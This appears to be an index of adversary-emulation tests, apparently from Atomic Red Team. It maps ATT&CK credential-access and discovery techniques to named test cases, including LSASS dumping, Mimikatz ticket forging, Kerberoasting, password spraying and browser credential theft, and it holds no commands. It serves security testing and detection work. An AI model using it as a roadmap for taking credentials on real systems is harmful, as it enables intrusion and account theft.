969 credential-access T1110.001 Brute Force: Password Guessing 4 SUDO brute force Debian 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a sh
970 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO brute force Redhat b72958a7-53e3-4809-9ee1-58f6ecd99ade sh
971 credential-access T1110.001 Brute Force: Password Guessing 6 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
972 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
973 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
974 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
975 credential-access T1003 OS Credential Dumping 4 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 powershell
976 credential-access T1003 OS Credential Dumping 5 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) 42510244-5019-48fa-a0e5-66c3b76e6049 powershell
977 credential-access T1003 OS Credential Dumping 6 Dump Credential Manager using keymgr.dll and rundll32.exe 84113186-ed3c-4d0d-8a3c-8980c86c1f4a powershell
978 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
979 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
980 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
981 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
982 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
983 credential-access T1003.002 OS Credential Dumping: Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
984 credential-access T1003.002 OS Credential Dumping: Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 command_prompt
985 credential-access T1003.002 OS Credential Dumping: Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
986 credential-access T1003.002 OS Credential Dumping: Security Account Manager 7 WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb powershell
987 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 1 Azure - Search Azure AD User Attributes for Passwords ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 powershell
988 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 2 Azure - Dump Azure Instance Metadata from Virtual Machines cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 powershell
989 credential-access T1110.002 Brute Force: Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
990 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
991 credential-access T1003.004 OS Credential Dumping: LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
992 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
993 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
994 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
995 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
996 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
997 credential-access T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
998 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
999 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1000 credential-access T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1001 credential-access T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1002 credential-access T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1003 credential-access T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1004 credential-access T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1005 credential-access T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1006 credential-access T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1007 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1008 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
1009 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
1010 credential-access T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
1011 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
1012 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
1013 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 3 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 8c385f88-4d47-4c9a-814d-93d9deec8c71 powershell
1014 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
1015 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
1016 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
1017 credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
1018 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
1019 credential-access T1555 Credentials from Password Stores 6 WinPwn - Loot local Credentials - lazagne 079ee2e9-6f16-47ca-a635-14efcd994118 powershell
1020 credential-access T1555 Credentials from Password Stores 7 WinPwn - Loot local Credentials - Wifi Credentials afe369c2-b42e-447f-98a3-fb1f4e2b8552 powershell
1021 credential-access T1555 Credentials from Password Stores 8 WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords db965264-3117-4bad-b7b7-2523b7856b92 powershell
1022 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
1023 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
1024 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
1025 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
1026 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
1027 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
1028 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
1029 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
1030 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
1031 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
1032 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 10 Stage Popular Credential Files for Exfiltration f543635c-1705-42c3-b180-efd6dc6e7ee7 powershell
1033 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 11 WinPwn - BrowserPwn 764ea176-fb71-494c-90ea-72e9d85dce76 powershell
1034 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 12 WinPwn - Loot local Credentials - mimi-kittenz ec1d0b37-f659-4186-869f-31a554891611 powershell
1035 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 13 WinPwn - PowerSharpPack - Sharpweb for Browser Credentials e5e3d639-6ea8-4408-9ecd-d5a286268ca0 powershell
1036 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
1037 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 15 WebBrowserPassView - Credentials from Browser e359627f-2d90-4320-ba5e-b0f878155bbe powershell
1038 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 16 BrowserStealer (Chrome / Firefox / Microsoft Edge) 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd powershell
1039 credential-access T1552.004 Unsecured Credentials: Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
1040 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
1041 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
1042 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
1043 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
1044 credential-access T1552.004 Unsecured Credentials: Private Keys 6 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
1045 credential-access T1552.004 Unsecured Credentials: Private Keys 7 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
1046 credential-access T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
1047 credential-access T1003.001 OS Credential Dumping: LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
1048 credential-access T1003.001 OS Credential Dumping: LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
1049 credential-access T1003.001 OS Credential Dumping: LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
1050 credential-access T1003.001 OS Credential Dumping: LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
1051 credential-access T1003.001 OS Credential Dumping: LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
1052 credential-access T1003.001 OS Credential Dumping: LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
1053 credential-access T1003.001 OS Credential Dumping: LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
1054 credential-access T1003.001 OS Credential Dumping: LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
1055 credential-access T1003.001 OS Credential Dumping: LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
1056 credential-access T1003.001 OS Credential Dumping: LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
1057 credential-access T1003.001 OS Credential Dumping: LSASS Memory 11 Dump LSASS with .Net 5 createdump.exe 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
1058 credential-access T1003.001 OS Credential Dumping: LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
1059 credential-access T1110.003 Brute Force: Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
1060 credential-access T1110.003 Brute Force: Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
1061 credential-access T1110.003 Brute Force: Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
1062 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
1063 credential-access T1110.003 Brute Force: Password Spraying 5 WinPwn - DomainPasswordSpray Attacks 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 powershell
1064 credential-access T1110.003 Brute Force: Password Spraying 6 Password Spray Invoke-DomainPasswordSpray Light b15bc9a5-a4f3-4879-9304-ea0011ace63a powershell
1065 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
1066 credential-access T1110.003 Brute Force: Password Spraying 8 Password Spray using Kerbrute Tool c6f25ec3-6475-47a9-b75d-09ac593c5ecb powershell
1067 credential-access T1110.003 Brute Force: Password Spraying 9 AWS - Password Spray an AWS using GoAWSConsoleSpray 9c10d16b-20b1-403a-8e67-50ef7117ed4e sh
1068 credential-access T1003.005 OS Credential Dumping: Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
1069 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
1070 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
1071 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
1072 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
1073 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
1074 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
1075 credential-access T1552.001 Unsecured Credentials: Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
1076 credential-access T1552.001 Unsecured Credentials: Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
1077 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 WinPwn - sensitivefiles 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 powershell
1078 credential-access T1552.001 Unsecured Credentials: Credentials In Files 7 WinPwn - Snaffler fdd0c913-714b-4c13-b40f-1824d6c015f2 powershell
1079 credential-access T1552.001 Unsecured Credentials: Credentials In Files 8 WinPwn - powershellsensitive 75f66e03-37d3-4704-9520-3210efbe33ce powershell
1080 credential-access T1552.001 Unsecured Credentials: Credentials In Files 9 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
1081 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
1082 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
1083 credential-access T1528 Steal Application Access Token 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
1084 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1085 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
1086 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
1087 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
1088 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
1089 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
1090 credential-access T1110.004 Brute Force: Credential Stuffing 3 Brute Force:Credential Stuffing using Kerbrute Tool 4852c630-87a9-409b-bb5e-5dc12c9ebcde powershell
1091 credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
1092 credential-access T1187 Forced Authentication 2 WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS 7f06b25c-799e-40f1-89db-999c9cc84317 powershell
1093 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
1094 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
1095 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
1096 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
1097 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1098 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1099 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
1100 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1101 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1102 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1103 credential-access T1003.003 OS Credential Dumping: NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
1104 credential-access T1003.003 OS Credential Dumping: NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
1105 credential-access T1003.003 OS Credential Dumping: NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
1106 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1107 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1108 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1109 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1110 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1111 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
1112 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
1113 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
1114 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
1115 credential-access T1003.006 OS Credential Dumping: DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
1116 credential-access T1003.006 OS Credential Dumping: DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
1117 credential-access T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1118 credential-access T1552.007 Kubernetes List Secrets 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
1119 credential-access T1552.007 Kubernetes List Secrets 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
1120 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
1121 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
1122 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
1123 discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
1124 discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
1125 discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
1126 discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
1127 discovery T1615 Group Policy Discovery 3 WinPwn - GPOAudit bc25c04b-841e-4965-855f-d1f645d7ab73 powershell
1128 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
1129 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
1130 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
1131 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
1132 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
1133 discovery T1087.002 Account Discovery: Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
1134 discovery T1087.002 Account Discovery: Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
1135 discovery T1087.002 Account Discovery: Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
1136 discovery T1087.002 Account Discovery: Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
1137 discovery T1087.002 Account Discovery: Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
1138 discovery T1087.002 Account Discovery: Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
1139 discovery T1087.002 Account Discovery: Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
1140 discovery T1087.002 Account Discovery: Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
1141 discovery T1087.002 Account Discovery: Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
1142 discovery T1087.002 Account Discovery: Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
1143 discovery T1087.002 Account Discovery: Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
1144 discovery T1087.002 Account Discovery: Domain Account 15 WinPwn - generaldomaininfo ce483c35-c74b-45a7-a670-631d1e69db3d powershell
1145 discovery T1087.002 Account Discovery: Domain Account 16 Kerbrute - userenum f450461c-18d1-4452-9f0d-2c42c3f08624 powershell
1146 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
1147 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
1148 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
1149 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
1150 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
1151 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
1152 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
1153 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
1154 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
1155 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
1156 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
